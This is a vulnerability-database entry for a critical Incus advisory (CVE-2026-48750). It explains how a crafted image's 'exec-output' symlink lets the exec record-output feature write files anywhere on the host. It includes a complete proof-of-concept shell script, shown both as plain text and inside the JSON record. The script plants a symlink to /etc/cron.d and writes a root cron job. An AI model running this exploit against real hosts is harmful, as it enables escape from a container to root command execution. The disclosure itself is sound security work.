GHSA-73HR-M85F-64V9

Vulnerability from github – Published: 2026-06-26 18:32 – Updated: 2026-06-26 18:32
VLAI
Summary
Incus has an arbitrary file write on host via `exec-output` symlink in crafted image
Details

Summary

The record-output parameter of the /instances/$name/exec endpoint stores the output of the command in the exec-output directory of the instance. If exec-output is a symlink, file named exec_UUID.stdout and exec_UUID.stderr can be written to an arbitrary location where the .stdout file will contain arbitrary content. This behavior can be abused for arbitrary command execution.

Details

When an image is unpacked, top-level symlinks are extracted as is; allowing for exec-output to be placed on disk. In instance_exec.go, os.Mkdir continues of exec-output exists and os.OpenFile follows the exec-output symlink.

PoC

Below, we place the exec_UUID.stdout file in /etc/cron.d on the host for arbitrary command execution.

#!/bin/sh
# usage: $0 existing-imagefp
set -eu

basefp="${1}"

die() {
        printf '%s' "${@}" >&2
        exit 1
}

command -v curl >/dev/null 2>&1 || die 'error: curl not found\n'
command -v python3 >/dev/null 2>&1 || die 'error: python3 not found\n'

tmpdir=$(mktemp -d)
cleanup() {
        rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP


# insert exec-output symlink

incus image export "${basefp}" "${tmpdir}/img"

mkdir "${tmpdir}/repack"
cd "${tmpdir}/repack"

xz -cd "${tmpdir}/img" | tar -f- -vx

rm -rf exec-output
ln -s /etc/cron.d exec-output

tar -f- -c * | gzip -c9 >"${tmpdir}/img"

cd - >/dev/null
incus image import "${tmpdir}"/img* --alias afw-exec-output


# Launch container, exec with record-output via REST API
incus launch afw-exec-output afw-exec-output
incus wait afw-exec-output ip

OP=$(curl -s --unix-socket /var/lib/incus/unix.socket \
  -X POST -H 'Content-Type: application/json' \
  -d '{"command":["/bin/sh","-c","echo * * * * * root id'"'>'"'/afw-exec-output"],"record-output":true}' \
  "lxd/1.0/instances/afw-exec-output/exec" | python3 -c "import sys,json;print(json.load(sys.stdin)['operation'])")

curl -s --unix-socket /var/lib/incus/unix.socket "$OP/wait?timeout=30" >/dev/null

#find /etc/cron.d/exec_* -exec cat {} \;

Impact

Constrained file creation in an arbitrary directory on the host via via an unsanitized symlink; possibly leading to command execution.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/lxc/incus/v7/cmd/incusd"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48750"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-73"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-26T18:32:52Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `record-output` parameter of the `/instances/$name/exec` endpoint stores the output of the command in the `exec-output` directory of the instance. If `exec-output` is a symlink, file named `exec_UUID.stdout` and `exec_UUID.stderr` can be written to an arbitrary location where the `.stdout` file will contain arbitrary content. This behavior can be abused for arbitrary command execution.\n\n\n### Details\n\nWhen an image is unpacked, top-level symlinks are extracted as is; allowing for `exec-output` to be placed on disk. In `instance_exec.go`, `os.Mkdir` continues of `exec-output` exists and `os.OpenFile` follows the `exec-output` symlink.\n\n\n### PoC\n\nBelow, we place the `exec_UUID.stdout` file in `/etc/cron.d` on\nthe host for arbitrary command execution.\n\n```\n#!/bin/sh\n# usage: $0 existing-imagefp\nset -eu\n\nbasefp=\"${1}\"\n\ndie() {\n        printf \u0027%s\u0027 \"${@}\" \u003e\u00262\n        exit 1\n}\n\ncommand -v curl \u003e/dev/null 2\u003e\u00261 || die \u0027error: curl not found\\n\u0027\ncommand -v python3 \u003e/dev/null 2\u003e\u00261 || die \u0027error: python3 not found\\n\u0027\n\ntmpdir=$(mktemp -d)\ncleanup() {\n        rm -rf \"${tmpdir}\"\n}\ntrap cleanup EXIT INT QUIT TERM HUP\n\n\n# insert exec-output symlink\n\nincus image export \"${basefp}\" \"${tmpdir}/img\"\n\nmkdir \"${tmpdir}/repack\"\ncd \"${tmpdir}/repack\"\n\nxz -cd \"${tmpdir}/img\" | tar -f- -vx\n\nrm -rf exec-output\nln -s /etc/cron.d exec-output\n\ntar -f- -c * | gzip -c9 \u003e\"${tmpdir}/img\"\n\ncd - \u003e/dev/null\nincus image import \"${tmpdir}\"/img* --alias afw-exec-output\n\n\n# Launch container, exec with record-output via REST API\nincus launch afw-exec-output afw-exec-output\nincus wait afw-exec-output ip\n\nOP=$(curl -s --unix-socket /var/lib/incus/unix.socket \\\n  -X POST -H \u0027Content-Type: application/json\u0027 \\\n  -d \u0027{\"command\":[\"/bin/sh\",\"-c\",\"echo * * * * * root id\u0027\"\u0027\u003e\u0027\"\u0027/afw-exec-output\"],\"record-output\":true}\u0027 \\\n  \"lxd/1.0/instances/afw-exec-output/exec\" | python3 -c \"import sys,json;print(json.load(sys.stdin)[\u0027operation\u0027])\")\n\ncurl -s --unix-socket /var/lib/incus/unix.socket \"$OP/wait?timeout=30\" \u003e/dev/null\n\n#find /etc/cron.d/exec_* -exec cat {} \\;\n```\n\n### Impact\n\nConstrained file creation in an arbitrary directory on the host via\nvia an unsanitized symlink; possibly leading to command execution.",
  "id": "GHSA-73hr-m85f-64v9",
  "modified": "2026-06-26T18:32:52Z",
  "published": "2026-06-26T18:32:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/lxc/incus/security/advisories/GHSA-73hr-m85f-64v9"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/lxc/incus"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Incus has an arbitrary file write on host via `exec-output` symlink in crafted image"
}



Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…